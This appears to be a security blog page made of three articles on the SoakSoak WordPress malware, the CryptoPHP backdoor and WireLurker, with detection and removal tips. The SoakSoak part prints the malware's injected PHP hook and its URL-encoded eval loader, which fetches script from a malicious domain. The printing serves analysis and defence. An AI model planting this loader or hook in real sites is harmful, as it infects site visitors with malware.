New SoakSoak Malware Compromises Over 100,000+ WordPress Websites

The users of WordPress, a free and open source blogging tool as well as content management system (CMS), are being informed of a wides pread malware attack campaign that has already compromised more than 100,000 websites worldwide and still counting.
Earlier Sunday morning, news broke throughout the WordPress community regarding a widespread malware attack that has already comprised over 100,000 websites and counting. This harmful malware campaign has been brought forth by SoakSoak.ru thus being dubbed the ‘SoakSoak Malware’ epidemic. Those affected by the virus may be experiencing erratic site behavior including unexpected redirects to SoakSoak.ru web pages along with the potential for automatic downloads of malicious files to visitor’s computers without consent. Google has already been on top of this infection and has added over 11,000 websites to their blacklist that could have a serious effect on the revenue potential for those site owners. The infections aren’t targeted strictly at WordPress sites, but it appears this is the largest platform that has been infected. According Sucuri, a WordPress security solution, the exact method of intrusion has not been pinpointed at this time although several signals led them to believe many WordPress users could have fallen victim to a recent vulnerability in the premium Slider Revolution plugin If you’re a site owner and worried about the potential risk of infection to your own website, head over to Free SiteCheck scanner to see whether you are in the clear or if the malware has already burrowed its way into your site.

(Sucuri – SoakSoak – SiteCheck)

---

SoakSoak Malware Anatomy

---

It is modifying the filewp-includes/template-loader.php and including this content:

<?php
function
FuncQueueObject()
{
wp_enqueue_script("swfobject");
}
add_action("wp_enqueue_scripts",
'FuncQueueObject');

This causes the wp-includes/js/swobject.js to be loaded on every page you view on the site which includes the malware here:

eval(decodeURIComponent
("%28%0D
%0A%66
%75%6E
%63%74
%69%6F
%6E%28
%29%0D
%0A%7B
%0D%..72
%69%70
%74%2E
%69%64
%3D%27
%78%78
%79%79
%7A%7A
%5F%70
%65%74
%75%73
%68%6F
%6B%27
%3B%0D
%0A%09
%68%65
%61%64
%2E%61
%70%70
%65%6E
%64%43
%68%69
%6C%64
%28%73
%63%72
%69%70
%74%29
%3B%0D
%0A%7D
%28%29
%0D%0A
%29%3B"));

This malware when decoded loads a javascript malware from the SoakSoack.ru domain, specifically this file:
hxxp://soaksoak.ru/xteas/code

---

How Remove SoakSoak Malware?

---

Currenty, there's no removal procedure yet to be found. Howere, we have listed the some steps to bring it down.
1. If you have installed a theme, template, or any plugin from SoakSoak.ru remove it immediately.
2. If you've hosted your WordPress site to any other hosting service, check there all you files and look for the above mentioned codes that cause the site infection.
3. If you believe you had never visited the SoakSoak.ru but you are observing unfamiliar behaviour of your WordPress site, login to you site then expand the widget templete and look for above mentioned codes and remove them.
4. When yo finish the step 1 and step 2 and 3, go back to Free SiteCheck scanner and scan it again to know whether your site is okay or not.

Love this article?

Share it with your friends on Facebook

How to Clear/Remove CryptoPHP PHP Deadly Malware

---

What is CryptoPHP

---

CryptoPHP is a dangerous threat named by the Fox-IT’s security research team who detected it for the first time in the year of 2013. (Read recent news about cryptophp). According to them the threat uses the backdoor themes and plug-ins which uses in the CMS (content management system) to attack the web servers. This is so because today many of the web administrators are using CMS rather than the raw HTML for building their websites. The popular CMS like Word press, Joomla and Drupal are under the attack as they are using the pirated themes and plug-ins on their websites. Once if you have installed these backdoor malicious themes and plug-ins on your website, the malware can be controlled by the attackers by manually or via command and control (CC) and email communications. From there on-wards they will use your website for illegal search optimization, which is known as Blackhat SEO.

Recommend Post:-How To Detect And Remove WireLurker Malware From iPhone, iPad

CryptoPHP carries several hardcoded domains for command-and-control communications and uses RSA encryption to protect its communications with the C2 servers. Some versions also have a backup ability to communicate over email if the C2 domains are taken down. The PHPCrypto malware can update itself, inject content into the compromised sites it sits on and perform several other functions. Fox IT has a very in-depth whitepaper available Operators of CryptoPHP currently abuse the backdoor for illegal search engine optimization, also known as Blackhat SEO. The backdoor is a well developed piece of code and dynamic in its use. The capabilities of the CryptoPHP backdoor include:
*. Integration into popular content management systems like WordPress, Drupal and Joomla.
*. Public key encryption for communication between the compromised server and the command and control (C2) server.
*. An extensive infrastructure in terms of C2 domains and IP’s.
*. Backup mechanisms in place against C2 domain takedowns in the form of email communication.
*. Manual control of the backdoor besides the C2 communication.
*. Remote updating of the list of C2 servers.
*. Ability to update itself.
From Last few days Abuseat/CBL have suddenly built this into their database. Now they are blocking server IP which contains CryptoPHP PHP malware.

---

How to Detect and Clean CryptoPHP PHP Malware

---

It seems attacker is injecting malware using social.png file. Here is a simple command that can really find all such files and print first 80 characters from this file just to confirm it’s content.

find/home/ -name "social*.png" -exec grep -E -o 'php.{0,80}' {} \; -print

You need to delete those files and examine such user account, Because just deleting this file will not actually solve anything. Also you can run following command.

find -L /home -type f -name '*.png' -print0 | xargs -0 file | grep "PHP script" > /root/crypto.txt

This will check all png files, you can expand it to check all jpg and gif files as well. The output will contain a list of files that are actually php scripts. Also I’d suggest to run maldet or clamav scan on your server to find out the CryptoPHP PHP malware. Make sure to update both clamav and maldet prior to scanning.
freshclam
maldet -u
Also submit IP removal request on CBL.
Important Tips:
*. Do not install web templates/themes from unknown website.
*. Before file installation, scan the whole document on well known website scanners like VirusTotal, Metascan Online and so on.
*. If you are a web developer, expand the whole file and look for unknown coding/characters. If unknown codes found, remove them in order to hit the code maker.

Love this article?

Share it with your friends on Facebook

How To Detect And Remove WireLurker Malware From iPhone, iPad

---

What is WireLurker?

---

The WireLurker malware, known to infect OS X powered Macs and iOS devices has stirred up the Apple community. Malware that successfully infects Apple products is rare. On the Mac that was because criminals tended to go after the much bigger Windows market, while on the iPhone and iPad, Apple's App Store security has been exemplary. Known to exist as a threat in China

---

How do I detect WireLurker?

---

The WireLurker malware installs a number of files on your OS X system, which set it up to detect any iOS systems you attach by a USB cable, and then install malware into that iOS device. If you have any of these files on your Mac, then you likely have the malware installed. These have been outlined by Palo Alto Networks, the company that discovered the malware, and for the current variant of the malware include the following files:
1. A file called run.sh in the Macintosh HD > Users > Shared folder
2. Any of the following files in the Mac into sh HD > Library > Launch Daemons folder

com.apple.machook_damon.plist

com.apple.globalupdate.plist

3. Any of the following files in the Macintosh HD > System > Library > Launch Daemons folder

com.apple.appstore.plughelper.plist

com.apple.MailServiceAgentHelper.plist

com.apple.systemkeychain-helper.plist

4. In addition, the following files and folders will be in the hidden usr/bin directory, which can be opened by pressing Shift-Command-G in the Finder and then then entering “/usr/bin” in the path field that shows up:

globalupdate/usr/local/machook/WatchProcitunesupdate
com.apple.MailServiceAgentHelper

If you see any or all of these files in your Mac’s hard drive, then your Mac has likely been compromised.

---

How to protect against WireLurker?

---

The first step Mac users can take to protect themselves is to not download or run any applications that come from third-party app stores. Go to OS X's System Preferences, click "Security and Privacy," and then select "Allow apps downloaded from Mac App Store (or Mac App Store and identified developers)." This will prevent the Mac from installing any software unauthorized by Apple. Next, install a decent OS X antivirus application. Some of the best ones are free, so you have nothing to lose. Be sure to keep all the software on all your iOS and OS X devices up-to-date. Apple is quite responsive about patching vulnerabilities. Never connect your iPhone to an unknown or untrusted computer, whether it's a Mac or a PC, or even an untrusted charger, chargers can actually be mini-computers.

---

How do I remove WireLurker?

---

Fortunately, WireLurker appears to be easy to remove. All you have to do is delete the related files from the affected Macs or iOS devices.
For Jailbroken Users
Step 1: Install a File manager such as iFile or Filza. You could also use SSH capabilities to gain access to your iDevice from your Mac or PC.
Step 2: Navigate to > Library > MobileSubstrate > DynamicLibraries.
Step 3: Here, look for a file named sfbase.dylib and if found, you know your device is infected. However, if no such file exists, breathe a sigh of relief. Normally one would perceive deleting this file as a removal of the threat that WireLurker is, but it is recommended that you do a complete restore of your iOS device from iTunes.
For Non-Jailbroken Users
Although there’s no way you can be infected by WireLurker at this point, considering Apple has placed in appropriate security measures, but, there’s a possibility that you conceived the malware a while back before the Cupertino giant took action. And if you believe that you’re infected, and don’t happen to be jailbroken, then read on.
Step 1: Open the Settings app and go to General > Profile.
Step 2: Check for any anomalous profile and if you find one delete it.
Step 3: Check all installed apps for strange behavior, and delete all strange or suspicious ones that you find installed. Again, it is highly recommended that you do a complete restore of your iOS device from iTunes till a more effective and sure fire solution comes up.